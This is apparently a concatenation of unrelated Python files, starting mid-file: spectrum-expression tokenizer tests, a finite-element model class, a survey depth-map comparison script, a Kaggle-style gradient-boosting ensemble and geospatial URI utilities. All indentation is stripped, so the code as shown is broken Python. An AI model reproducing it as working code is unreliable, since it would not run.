('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1356a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el2471a.fits'),
('RPAREN', None),
('RPAREN', None),
('*', None),
('FLOAT', '0.5')]),
(('spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),'
'band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)*0.1+'
'spec(el1302a.fits)*0.066666667+spec(el1356a.fits)*0.0060+'
'spec(el2471a.fits)*0.0050)'),
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'earthshine.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.5'),
('+', None),
('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'Zodi.fits'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'johnson'),
(',', None),
('IDENTIFIER', 'v'),
('RPAREN', None),
(',', None),
('FLOAT', '22.7'),
(',', None),
('IDENTIFIER', 'vegamag'),
('RPAREN', None),
('+', None),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1215a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.1'),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1302a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.066666667'),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1356a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.0060'),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el2471a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.0050'),
('RPAREN', None)]),
(('spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),'
'22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+'
'spec(el1356a.fits)+spec(el2471a.fits))'),
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'earthshine.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.5'),
('+', None),
('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'Zodi.fits'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'johnson'),
(',', None),
('IDENTIFIER', 'v'),
('RPAREN', None),
(',', None),
('FLOAT', '22.7'),
(',', None),
('IDENTIFIER', 'vegamag'),
('RPAREN', None),
('+', None),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1215a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1302a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1356a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el2471a.fits'),
('RPAREN', None),
('RPAREN', None)])])
def test_stream(text, result):
stream_t(text, result)
@pytest.mark.xfail(reason='does not work')
@pytest.mark.parametrize(
('text', 'result'),
[('rn(unit(1.,flam),band(stis,ccd,g430m,c4451,52X0.2),10.000000,abmag)',
[('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'unit'),
('LPAREN', None),
('FLOAT', '1.'),
(',', None),
('IDENTIFIER', 'flam'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'stis'),
(',', None),
('IDENTIFIER', 'ccd'),
(',', None),
('IDENTIFIER', 'g430m'),
(',', None),
('IDENTIFIER', 'c4451'),
(',', None),
('IDENTIFIER', '52X0.2'),
('RPAREN', None),
(',', None),
('FLOAT', '10.000000'),
(',', None),
('IDENTIFIER', 'abmag'),
('RPAREN', None)]),
('rn(unit(1.,flam),band(stis,ccd,mirror,50CCD),10.000000,abmag)',
[('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'unit'),
('LPAREN', None),
('FLOAT', '1.'),
(',', None),
('IDENTIFIER', 'flam'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'stis'),
(',', None),
('IDENTIFIER', 'ccd'),
(',', None),
('IDENTIFIER', 'mirror'),
(',', None),
('IDENTIFIER', '50CCD'),
('RPAREN', None),
(',', None),
('FLOAT', '10.000000'),
(',', None),
('IDENTIFIER', 'abmag'),
('RPAREN', None)])])
def test_stream_xfail(text, result):
stream_t(text, result)
@pytest.mark.xfail(reason='does not work')
def test_tokens():
for x in tokens:
typ, val = x
tkl = scanner.tokenize(val)
assert len(tkl) == 1, 'too many tokens\n' + print_token_list(tkl)
assert tkl[0].type == typ, \
('wrong type: found {} want {}\n'.format(tkl[0].type, typ) +
print_token_list(tkl))
assert tkl[0].attr == val or tkl[0].attr is None or \
(val.startswith('@') and tkl[0].attr == val[1:]), \
('token value incorrect: found {} want {}'.format(
tkl[0].attr, val) + print_token_list(tkl))
|
40597
|
import numpy as np
import pandas as pd
from welib.tools.clean_exceptions import *
from welib.FEM.graph import Node as GraphNode
from welib.FEM.graph import Element as GraphElement
from welib.FEM.graph import NodeProperty
from welib.FEM.graph import GraphModel
class MaterialProperty(NodeProperty):
def __init__(self):
NodeProperty.__init__(self)
pass
class FEMNode(GraphNode):
def __init__(self, ID, x, y, z=0, Type=None, DOFs=None):
GraphNode.__init__(self, ID, x, y, z)
self.DOFs = DOFs if DOFs is not None else []  # avoid a shared mutable default argument
def __repr__(self):
s='<Node{:4d}> x:{:7.2f} y:{:7.2f} z:{:7.2f}, DOFs: {}'.format(self.ID, self.x, self.y, self.z, self.DOFs)
return s
class FEMElement(GraphElement):
def __init__(self, ID, nodeIDs, nodes=None, properties=None):
GraphElement.__init__(self, ID, nodeIDs, nodes, properties)
self.Ce=[]
self.Ke=[]
self.Me=[]
def __repr__(self):
s='<Elem{:4d}> NodeIDs: {}'.format(self.ID, self.nodeIDs)
if self.nodes is not None:
s+=' l={:.2f}'.format(self.length)
return s
class BeamElement(FEMElement):
def __init__(self, ID, nodeIDs, nodes, properties=None):
super(BeamElement,self).__init__(ID, nodeIDs, nodes=nodes, properties=properties)
class FEMModel(GraphModel):
def __init__(self):
GraphModel.__init__(self)
self.MM = None
self.KK = None
self.DD = None
self.nDOF = None
def setFullMatrices(self,MM,KK,DD=None):
self.MM=MM
self.KK=KK
if DD is not None:
self.DD=DD
def CraigBampton(self, Ileader, Ifollow=None, Ifixed=None):
""" """
from welib.FEM.reduction import CraigBampton
if Ifixed is not None:
M,K = self.applyFixBC()
else:
M,K = self.MM, self.KK
return CraigBampton(M, K, Ileader, Ifollow=Ifollow)
def DOF2Nodes(self):
DOF2Nodes=np.zeros((self.nDOF,4),int)
for iN,node in enumerate(self.Nodes):
for iiDOF,iDOF in enumerate(node.DOFs):
DOF2Nodes[iDOF,0] = iDOF
DOF2Nodes[iDOF,1] = iN
DOF2Nodes[iDOF,2] = len(node.DOFs)
DOF2Nodes[iDOF,3] = iiDOF+1
return DOF2Nodes
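# Minimal usage sketch (hypothetical 2-DOF system): assemble the full matrices and reduce
# with DOF 0 as the single leader. This assumes welib.FEM.reduction.CraigBampton accepts
# Ifollow=None and derives the follower DOFs itself; it is an illustration only, not part
# of the library code above.
def _example_craig_bampton():
    mdl = FEMModel()
    M = np.eye(2)
    K = np.array([[2.0, -1.0], [-1.0, 1.0]])
    mdl.setFullMatrices(M, K)
    return mdl.CraigBampton(Ileader=[0])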
if __name__=='__main__':
np.set_printoptions(linewidth=500)
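# NOTE: SubDynModel and fromSummaryFile are not defined or imported in this file; this
# demo block assumes they are provided elsewhere in the surrounding package.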
mdl=SubDynModel()
mdl.fromSummaryFile('../../data/Monopile/Pendulum.SD.sum.yaml')
|
40622
|
from __future__ import print_function
from astrometry.util.fits import *
import fitsio  # fitsio.read() is called below; import it explicitly rather than relying on the star imports
import pylab as plt
import numpy as np
from glob import glob
from astrometry.util.plotutils import *
from astrometry.libkd.spherematch import *
from astrometry.util.resample import *
from astrometry.util.util import *
ps = PlotSequence('cosmos')
baseA = 'cosmos-dr5-60/'
baseB = 'cosmos-dr5-67/'
Atxt = '60'
Btxt = '67'
TA = merge_tables([fits_table(fn) for fn in glob(baseA + 'tractor/*/tractor-*.fits')])
print('Total of', len(TA), 'sources in 60')
TA.cut(TA.brick_primary)
print(len(TA), 'brick primary')
TB = merge_tables([fits_table(fn) for fn in glob(baseB + 'tractor/*/tractor-*.fits')])
print('Total of', len(TB), 'sources in 67')
TB.cut(TB.brick_primary)
print(len(TB), 'brick primary')
ramin = min(TA.ra.min(), TB.ra.min())
ramax = max(TA.ra.max(), TB.ra.max())
decmin = min(TA.dec.min(), TB.dec.min())
decmax = max(TA.dec.max(), TB.dec.max())
# Create low-res depth maps
pixsc = 10. * 0.262/3600.
rc,dc = (ramin+ramax)/2., (decmin+decmax)/2.
w = int((ramax - ramin) * np.cos(np.deg2rad(dc)) / pixsc)
h = int((decmax - decmin) / pixsc)
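# Tan(crval1, crval2, crpix1, crpix2, cd11, cd12, cd21, cd22, imagew, imageh): a TAN WCS
# centered on (rc, dc) with the reference pixel at the image center and a pixel scale of
# pixsc degrees per pixel (RA axis flipped, as usual for sky images).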
wcs = Tan(rc, dc, w/2., h/2., -pixsc, 0., 0., pixsc, float(w), float(h))
#print('WCS:', wcs)
#for band in ['g','r','z']:
for band in ['g']:
psfdepthA = np.zeros(wcs.shape, np.float32)
psfdepthB = np.zeros(wcs.shape, np.float32)
for fn in glob(baseA + 'coadd/*/*/legacysurvey-*-depth-%s.fits*' % band):
print('Reading', fn)
iwcs = Tan(fn, 1)
Yo,Xo,Yi,Xi,nil = resample_with_wcs(wcs, iwcs)
dmap = fitsio.read(fn)
#I = np.flatnonzero(np.isfinite(dmap) * (dmap > 0))
#print(len(I), 'finite & positive values')
psfdepthA[Yo,Xo] = dmap[Yi,Xi]
for fn in glob(baseB + 'coadd/*/*/legacysurvey-*-depth-%s.fits*' % band):
print('Reading', fn)
iwcs = Tan(fn, 1)
Yo,Xo,Yi,Xi,nil = resample_with_wcs(wcs, iwcs)
dmap = fitsio.read(fn)
#I = np.flatnonzero(np.isfinite(dmap) * (dmap > 0))
#print(len(I), 'finite & positive values')
psfdepthB[Yo,Xo] = dmap[Yi,Xi]
galdepthA = np.zeros(wcs.shape, np.float32)
galdepthB = np.zeros(wcs.shape, np.float32)
for fn in glob(baseA + 'coadd/*/*/legacysurvey-*-galdepth-%s.fits*' % band):
print('Reading', fn)
iwcs = Tan(fn, 1)
Yo,Xo,Yi,Xi,nil = resample_with_wcs(wcs, iwcs)
dmap = fitsio.read(fn)
#I = np.flatnonzero(np.isfinite(dmap) * (dmap > 0))
#print(len(I), 'finite & positive values')
galdepthA[Yo,Xo] = dmap[Yi,Xi]
for fn in glob(baseB + 'coadd/*/*/legacysurvey-*-galdepth-%s.fits*' % band):
print('Reading', fn)
iwcs = Tan(fn, 1)
Yo,Xo,Yi,Xi,nil = resample_with_wcs(wcs, iwcs)
dmap = fitsio.read(fn)
#I = np.flatnonzero(np.isfinite(dmap) * (dmap > 0))
#print(len(I), 'finite & positive values')
galdepthB[Yo,Xo] = dmap[Yi,Xi]
print('PsfdepthA (iv)', psfdepthA.min(), psfdepthA.max())
print('PsfdepthB (iv)', psfdepthB.min(), psfdepthB.max())
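# Convert the inverse-variance depth maps (flux iv, nanomaggies^-2 in the Legacy Surveys
# convention) to 5-sigma AB magnitudes: mag = 22.5 - 2.5*log10(5/sqrt(iv)), i.e. the
# magnitude of a source detected at exactly 5 sigma.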
psfdepthA = -2.5 * (np.log10(5./np.sqrt(psfdepthA)) - 9)
psfdepthB = -2.5 * (np.log10(5./np.sqrt(psfdepthB)) - 9)
print('PsfdepthA', psfdepthA.min(), psfdepthA.max())
print('PsfdepthB', psfdepthB.min(), psfdepthB.max())
galdepthA = -2.5 * (np.log10(5./np.sqrt(galdepthA)) - 9)
galdepthB = -2.5 * (np.log10(5./np.sqrt(galdepthB)) - 9)
print('GaldepthA', galdepthA.min(), galdepthA.max())
print('GaldepthB', galdepthB.min(), galdepthB.max())
ima = dict(interpolation='nearest', origin='lower',
extent=[ramax,ramin,decmin,decmax], vmin=20.0, vmax=24.5)
plt.clf()
plt.subplot(1,2,1)
plt.imshow(psfdepthA, **ima)
plt.title(Atxt)
plt.subplot(1,2,2)
plt.imshow(psfdepthB, **ima)
plt.title(Btxt)
plt.suptitle('PSF Depth maps (%s)' % band)
ps.savefig()
plt.clf()
plt.subplot(1,2,1)
plt.imshow(galdepthA, **ima)
plt.title(Atxt)
plt.subplot(1,2,2)
plt.imshow(galdepthB, **ima)
plt.title(Btxt)
plt.suptitle('Galaxy Depth maps (%s)' % band)
ps.savefig()
# dd = np.append(galdepthA.ravel(), galdepthB.ravel())
# dd = dd[np.isfinite(dd)]
# thresh = np.percentile(dd, 10)
# print('Depth threshold:', thresh)
thresh = 24.0
hh,ww = wcs.shape
ok,xx,yy = wcs.radec2pixelxy(TA.ra, TA.dec)
xx = np.clip((np.round(xx) - 1), 0, ww-1).astype(int)
yy = np.clip((np.round(yy) - 1), 0, hh-1).astype(int)
I = np.flatnonzero((galdepthA[yy,xx] > thresh) * (galdepthB[yy,xx] > thresh))
print(len(I), 'of', len(TA), 'sources in A are in good-depth regions')
TA.cut(I)
ok,xx,yy = wcs.radec2pixelxy(TB.ra, TB.dec)
xx = np.clip((np.round(xx) - 1), 0, ww-1).astype(int)
yy = np.clip((np.round(yy) - 1), 0, hh-1).astype(int)
I = np.flatnonzero((galdepthA[yy,xx] > thresh) * (galdepthB[yy,xx] > thresh))
print(len(I), 'of', len(TB), 'sources in B are in good-depth regions')
TB.cut(I)
ha = dict(range=(18,27), bins=50, histtype='stepfilled', alpha=0.1)
hb = dict(range=(18,27), bins=50, histtype='stepfilled', alpha=0.1)
plt.clf()
plt.hist(np.maximum(psfdepthA.ravel(), 18), color='b', label=Atxt, **ha)
plt.hist(np.maximum(psfdepthB.ravel(), 18), color='r', label=Btxt, **hb)
plt.xlim(18,27)
plt.legend()
plt.title('PSF depth map values (g mag)')
ps.savefig()
plt.clf()
plt.hist(np.maximum(galdepthA.ravel(), 18), color='b', label=Atxt, **ha)
plt.hist(np.maximum(galdepthB.ravel(), 18), color='r', label=Btxt, **hb)
plt.xlim(18,27)
plt.legend()
plt.title('Galaxy depth map values (%s mag)' % band)
ps.savefig()
TA.mag_g = -2.5 * (np.log10(TA.flux_g) - 9)
TB.mag_g = -2.5 * (np.log10(TB.flux_g) - 9)
TA.psfdepth_mag_g = -2.5 * (np.log10(5./np.sqrt(TA.psfdepth_g)) - 9)
TB.psfdepth_mag_g = -2.5 * (np.log10(5./np.sqrt(TB.psfdepth_g)) - 9)
TA.galdepth_mag_g = -2.5 * (np.log10(5./np.sqrt(TA.galdepth_g)) - 9)
TB.galdepth_mag_g = -2.5 * (np.log10(5./np.sqrt(TB.galdepth_g)) - 9)
ha = dict(range=(18,27), bins=50, histtype='stepfilled', alpha=0.1)
hb = dict(range=(18,27), bins=50, histtype='stepfilled', alpha=0.1)
ha2 = dict(range=(18,27), bins=50, histtype='step', alpha=0.5)
hb2 = dict(range=(18,27), bins=50, histtype='step', alpha=0.5)
plt.clf()
plt.hist(TA.mag_g, color='b', label=Atxt, **ha)
plt.hist(TA.mag_g, color='b', **ha2)
plt.hist(TB.mag_g, color='r', label=Btxt, **hb)
plt.hist(TB.mag_g, color='r', **hb2)
plt.xlim(18,27)
plt.legend()
plt.xlabel('All sources: g mag')
ps.savefig()
ha = dict(range=(23,25), bins=50, histtype='stepfilled', alpha=0.1)
hb = dict(range=(23,25), bins=50, histtype='stepfilled', alpha=0.1)
plt.clf()
plt.hist(TA.psfdepth_mag_g, color='b', label=Atxt, **ha)
plt.hist(TB.psfdepth_mag_g, color='r', label=Btxt, **hb)
plt.xlim(23,25)
plt.legend()
plt.title('PSF depth for sources (g mag)')
ps.savefig()
plt.clf()
plt.hist(TA.galdepth_mag_g, color='b', label=Atxt, **ha)
plt.hist(TB.galdepth_mag_g, color='r', label=Btxt, **hb)
plt.xlim(23,25)
plt.legend()
plt.title('Gal depth for sources (g mag)')
ps.savefig()
ha = dict(range=((ramin,ramax),(decmin,decmax)), doclf=False,
docolorbar=False, imshowargs=dict(vmin=0, vmax=14))
plt.clf()
plt.subplot(1,2,1)
plothist(TA.ra, TA.dec, 200, **ha)
plt.title(Atxt)
plt.subplot(1,2,2)
plothist(TB.ra, TB.dec, 200, **ha)
plt.title(Btxt)
plt.suptitle('All sources')
ps.savefig()
I,J,d = match_radec(TA.ra, TA.dec, TB.ra, TB.dec, 1./3600.)
unmatchedA = np.ones(len(TA), bool)
unmatchedB = np.ones(len(TB), bool)
unmatchedA[I] = False
unmatchedB[J] = False
ha = dict(range=((ramin,ramax),(decmin,decmax)), doclf=False,
docolorbar=False, imshowargs=dict(vmin=0, vmax=5))
plt.clf()
plt.subplot(1,2,1)
plothist(TA.ra[unmatchedA], TA.dec[unmatchedA], 200, **ha)
plt.title(Atxt)
plt.subplot(1,2,2)
plothist(TB.ra[unmatchedB], TB.dec[unmatchedB], 200, **ha)
plt.title(Btxt)
plt.suptitle('Un-matched sources')
ps.savefig()
|
40627
|
import time
import pytest
@pytest.mark.parametrize("index", range(7))
def test_cat(index):
"""Perform several tests with varying execution times."""
time.sleep(0.2 + (index * 0.1))
assert True
|
40661
|
import numpy as np
import pandas as pd
from sklearn.model_selection import StratifiedKFold
import lightgbm as lgb
import xgboost as xgb
# read dataset
df_train = pd.read_csv('train.csv')
df_test = pd.read_csv('test.csv')
# gini function
def gini(actual, pred, cmpcol = 0, sortcol = 1):
assert( len(actual) == len(pred) )
all = np.asarray(np.c_[ actual, pred, np.arange(len(actual)) ], dtype=float)
all = all[ np.lexsort((all[:,2], -1*all[:,1])) ]
totalLosses = all[:,0].sum()
giniSum = all[:,0].cumsum().sum() / totalLosses
giniSum -= (len(actual) + 1) / 2.
return giniSum / len(actual)
def gini_normalized(a, p):
return gini(a, p) / gini(a, a)
def gini_xgb(preds, dtrain):
labels = dtrain.get_label()
gini_score = gini_normalized(labels, preds)
return 'gini', gini_score
def gini_lgb(preds, dtrain):
labels = dtrain.get_label()
gini_score = gini_normalized(labels, preds)
return 'gini', gini_score, True
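# Quick sanity check (illustrative, not from the original script): a perfect ranking
# gives a normalized Gini of 1.0, e.g. gini_normalized([1, 0, 1, 0], [0.9, 0.1, 0.8, 0.3]) == 1.0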
# define fold number
kfold = 5
skf = StratifiedKFold(n_splits=kfold, shuffle=True, random_state=42)
# Assumed dataset layout (hypothetical column names): an 'id' column plus a binary 'target' in train.csv
X = df_train.drop(['id', 'target'], axis=1).values
y = df_train['target'].values
test = df_test.drop(['id'], axis=1)
test_id = df_test['id'].values
sub = pd.DataFrame()
sub['id'] = test_id
sub['target'] = np.zeros(len(test_id), dtype=float)  # float zeros so fractional predictions are not truncated
params_xgd = {
'min_child_weight': 10.0,
'objective': 'binary:logistic',
'max_depth': 7,
'max_delta_step': 1.8,
'colsample_bytree': 0.4,
'subsample': 0.8,
'eta': 0.005,
'gamma': 0.65,
'num_boost_round' : 700
}
params_lgb = {
'max_depth': 7,
'learning_rate': 0.005,
'objective': 'binary'
}
for i, (train_index, test_index) in enumerate(skf.split(X, y)):
print('[Fold %d/%d]' % (i + 1, kfold))
X_train, X_valid = X[train_index], X[test_index]
y_train, y_valid = y[train_index], y[test_index]
d_train = lgb.Dataset(X_train, y_train)
d_valid = lgb.Dataset(X_valid, y_valid)
watchlist = [d_train, d_valid]
model_lgb = lgb.train(params_lgb, d_train, 1600, watchlist, early_stopping_rounds = 70, feval = gini_lgb, verbose_eval = 100)
d_train = xgb.DMatrix(X_train, y_train)
d_valid = xgb.DMatrix(X_valid, y_valid)
d_test = xgb.DMatrix(test.values)
watchlist = [(d_train, 'train'), (d_valid, 'valid')]
model_xgb = xgb.train(params_xgd, d_train, 1600, watchlist, early_stopping_rounds = 70, feval = gini_xgb, maximize = True, verbose_eval = 100)
print('[Fold %d/%d Prediction:]' % (i + 1, kfold))
pred_xgb = model_xgb.predict(d_test, ntree_limit = model_xgb.best_ntree_limit)
pred_lgb = model_lgb.predict(test.values)
# 0.7 from xgb, 0.3 from lgb. You can play around here
sub['target'] += (pred_xgb * 0.7 + pred_lgb * 0.3) / kfold
|
40665
|
import os
import re
import warnings
from uuid import uuid4, UUID
import shapely.geometry
import geopandas as gpd
import pandas as pd
import numpy as np
from geojson import LineString, Point, Polygon, Feature, FeatureCollection, MultiPolygon
try:
import simplejson as json
except ImportError:
import json
from .config import get_settings
from ..static import UriType
def _abs_path(path, mkdir=True):
"""Gets the absolute path for a file to be within the Quest directory,
and will create a directory of that filename.
Args:
path (string): A string that is a filename.
mkdir (bool): A boolean if the user wants to create the directory.
Returns:
A string giving the absolute path of the file within the Quest directory.
"""
if not os.path.isabs(path):
path = os.path.join(get_quest_dir(), path)
if mkdir:
os.makedirs(path, exist_ok=True)
return path
def bbox2poly(x1, y1, x2, y2, reverse_order=False, as_geojson=False, as_shapely=False):
"""Converts a bounding box to a polygon.
Args:
x1 (int): An int for the first x coordinate.
y1 (int): An int for the first y coordinate.
x2 (int): An int for the second x coordinate.
y2 (int): An int for the second y coordinate.
reverse_order (bool): A boolean to switch the order of the x and y coordinates.
as_geojson (bool): A bool to convert the polygon to a geojson object.
as_shapely (bool): A bool to convert the polygon to a shapely object.
Returns:
If the bool is false for both geojson and shapely then just a list is returned.
If the bool is true for both geojson and shapely then a shapely object is returned.
If the bool is true for just the geojson, then a geojson object is returned.
If the bool is true for just the shapely, then a shapely object is returned.
"""
if reverse_order:
x1, y1 = y1, x1
x2, y2 = y2, x2
xmin, xmax = [float(x1), float(x2)]
ymin, ymax = [float(y1), float(y2)]
poly = list([[xmin, ymin], [xmin, ymax], [xmax, ymax], [xmax, ymin]])
poly.append(poly[0])
if not (as_geojson or as_shapely):
return poly
if as_geojson:
polygon = Polygon
multi_polygon = MultiPolygon
if as_shapely:
polygon = shapely.geometry.Polygon
multi_polygon = shapely.geometry.MultiPolygon
xmin2 = xmax2 = None
if xmin < -180:
xmin2 = 360 + xmin
xmin = -180
if xmax > 180:
xmax2 = xmax - 360
xmax = 180
if xmin2 is None and xmax2 is None:
return polygon(poly)
# else bbox spans 180 longitude so create multipolygon
poly1 = list([[xmin, ymin], [xmin, ymax], [xmax, ymax], [xmax, ymin]])
poly1.append(poly1[0])
xmin = xmin2 or -180
xmax = xmax2 or 180
poly2 = list([[xmin, ymin], [xmin, ymax], [xmax, ymax], [xmax, ymin]])
poly2.append(poly2[0])
return multi_polygon(polygons=[polygon(poly1), polygon(poly2)])
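# Illustrative examples (not from the original source):
#   bbox2poly(0, 0, 10, 10) -> closed 5-point ring [[0,0],[0,10],[10,10],[10,0],[0,0]]
#   bbox2poly(170, -10, 190, 10, as_shapely=True) -> MultiPolygon split at the 180th meridian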
def classify_uris(uris, grouped=True, as_dataframe=True, require_same_type=False, exclude=None, raise_if_empty=True):
"""Converts a list of uris into a pandas dataframe.
Notes:
Classified by resource type.
Args:
uris (list or string): List of Quest uris to classify into the following types: 'collections', 'services',
'publishers', or 'datasets'.
grouped (bool): If True returns
Pandas GroupBy object (see: https://pandas.pydata.org/pandas-docs/stable/groupby.html)
as_dataframe (bool): If True returns a Pandas DataFrame
require_same_type (bool): If True raises a `ValueError` if uris of more than one type are passed in.
exclude (list or string): List of uri types to not allow. If a uri of an excluded type is passed in
then a `ValueError` will be raised.
Returns:
A pandas DataFrame, a GroupBy object (if grouped is True), or a dict of lists (if as_dataframe is False).
"""
uris = listify(uris)
df = pd.DataFrame(uris, columns=['uri'])
df['type'] = UriType.COLLECTION
uuid_idx = df['uri'].apply(is_uuid)
service_idx = df['uri'].str.startswith('svc://')
publish_idx = df['uri'].str.startswith('pub://')
dataset_idx = uuid_idx & df['uri'].str.startswith('d')
df.loc[service_idx, 'type'] = UriType.SERVICE
df.loc[publish_idx, 'type'] = UriType.PUBLISHER
df.loc[dataset_idx, 'type'] = UriType.DATASET
df.set_index('uri', drop=False, inplace=True)
grouped_df = df.groupby('type')
if raise_if_empty:
if df.empty:
raise ValueError('At least one uri must be specified.')
if exclude is not None:
for uri_type in exclude:
if uri_type in grouped_df.groups:
raise ValueError('Uris for {0} are not allowed.'.format(uri_type))
if require_same_type and len(grouped_df.groups.keys()) > 1:
raise ValueError('All uris must be of the same type')
if not as_dataframe:
groups = {k: list(v) for k, v in grouped_df.groups.items()}
return groups
if grouped:
return grouped_df
return df
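# Illustrative example (hypothetical uris, assumes a configured Quest environment):
#   classify_uris(['svc://usgs-nwis:dv', 'pub://provider:pub'], as_dataframe=False)
#   -> {UriType.SERVICE: ['svc://usgs-nwis:dv'], UriType.PUBLISHER: ['pub://provider:pub']}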
def construct_service_uri(provider, service, catalog_id=None):
"""Builds a uri from the given parameters.
Args:
provider (string): A string of the provider.
service (string): A string of the service.
catalog_id (string): A string of the catalog_id.
Returns:
If there is no catalog_id then the uri will just be the provider
and service, else the catalog_id will be appended to the end of the
uri.
"""
uri = 'svc://{}:{}'.format(provider, service)
if catalog_id is not None:
uri = '{}/{}'.format(uri, catalog_id)
return uri
def convert_nodata_to_nans(xarr):
"""
Args:
xarr:
Returns:
"""
nodata_attr = [k for k in xarr.attrs.keys() if k.lower().startswith('nodata')][0]
nodata = xarr.attrs[nodata_attr]
if nodata:
if str(xarr.dtype).startswith('int') or str(xarr.dtype).startswith('uint'):
xarr.values = xarr.values.astype(np.float32)
xarr.values[xarr.values == nodata] = np.nan
return xarr
def get_cache_dir(service=None):
"""Gets the absolute path of the cached directory.
Args:
service (string): A string of the specific service the user wants.
Returns:
A string of the path to the cached directory.
"""
settings = get_settings()
path = _abs_path(settings['CACHE_DIR'])
if service is not None:
path = os.path.join(path, service)
return path
def get_projects_dir():
"""Gets the absolute path of the projects directory within Quest.
Returns:
An absolute path leading to the project directory from within Quest.
"""
settings = get_settings()
return _abs_path(settings['PROJECTS_DIR'], mkdir=False)
def get_quest_dir():
"""Gets the absolute path of the Quest directory.
Returns:
An absolute path of the Quest directory.
"""
settings = get_settings()
return settings['BASE_DIR']
def is_remote_uri(path):
"""Checks if the incoming path is a remote uri.
Args:
path (string): A string that is either a path or uri.
Returns:
If the path is a remote destination then true, false otherwise.
"""
return bool(re.search(r'^https?://', path))
def is_uuid(uuid):
"""Check if string is a uuid4.
Notes:
source: https://gist.github.com/ShawnMilo/7777304
Args:
uuid (int): A universal unique identifier.
Returns:
If the uuid is version 4 then true, else false otherwise.
"""
try:
val = UUID(uuid, version=4)
except ValueError:
# If it's a value error, then the string is not a valid UUID.
return False
# If the uuid_string is a valid hex code, but an invalid uuid4,
# the UUID.__init__ will convert it to a valid uuid4.
# This is bad for validation purposes.
return val.hex == uuid
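# Example: is_uuid(uuid4().hex) -> True; is_uuid('not-a-uuid') -> False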
def listify(liststr, delimiter=','):
"""Converts a string into a list.
Args:
liststr (string): A string of words or etc.
delimiter (char): A char that will be used as the delimiter identifier.
Returns:
If a string, it is split on the delimiter and returned as a list.
If None, None is returned.
If already a list (or tuple, set, dict), it is returned unchanged.
Otherwise, the item is wrapped in a single-element list.
"""
if liststr is None:
return None
if isinstance(liststr, (tuple, list, set, dict)):
return liststr
elif isinstance(liststr, str):
return [s.strip() for s in liststr.split(delimiter)]
else:
return [liststr]
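# Example: listify('a, b,c') -> ['a', 'b', 'c']; listify(['x']) -> ['x']; listify(None) -> None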
def parse_service_uri(uri):
"""Parses a service uri into separate provider, service, and catalog_id strings.
Examples:
usgs-nwis:dv/0800345522
gebco-bathymetry
usgs-ned:1-arc-second
Args:
uri (string): A string that is a uri.
Returns:
Three strings are returned from the parsed uri.
"""
svc, catalog_id = (uri.split('://')[-1].split('/', 1) + [None])[:2]
provider, service = (svc.split(':') + [None])[:2]
return provider, service, catalog_id
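# Example: parse_service_uri('svc://usgs-nwis:dv/0800345522') -> ('usgs-nwis', 'dv', '0800345522')
#          parse_service_uri('svc://gebco-bathymetry') -> ('gebco-bathymetry', None, None)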
def setattr_on_dataframe(df, attr, value, warnings_filter='ignore'):
with warnings.catch_warnings():
warnings.simplefilter(warnings_filter)
setattr(df, attr, value)
def to_geodataframe(feature_collection):
"""Converts a dictionary to a GeoPandas Dataframe object.
Args:
feature_collection (dictionary): A dictionary that contains features.
Returns:
A GeoPandas Dataframe.
"""
features = {}
for feature in feature_collection['features']:
data = feature['properties']
data.update({
'service_id': feature['id'],
'geometry': shapely.geometry.shape(feature['geometry'])
})
features[feature['id']] = data
return gpd.GeoDataFrame.from_dict(features, orient='index')
def to_geojson(df):
"""Converts a dataframe to a geojson object.
Args:
df (dataframe): A dataframe that is being converted to a geojson object.
Returns:
A geojson object is what is being returned.
"""
_func = {
'LineString': LineString,
'Point': Point,
'Polygon': Polygon,
}
features = []
if not df.empty:
# TODO what is this code doing and is it now obsolete with the new DB?
idx = df.columns.str.startswith('_')
r = {field: field[1:] for field in df.columns[idx]}
for uid, row in df.iterrows():
metadata = json.loads(row[~idx].dropna().to_json())
row = row[idx].rename(index=r)
# create geojson geometry
geometry = None
if row['geom_type'] is not None:
coords = row['geom_coords']
if not isinstance(coords, (list, tuple)):
coords = json.loads(coords)
geometry = _func[row['geom_type']](coords)
del row['geom_type']
del row['geom_coords']
# split fields into properties and metadata
properties = json.loads(row.dropna().to_json())
properties.update({'metadata': metadata})
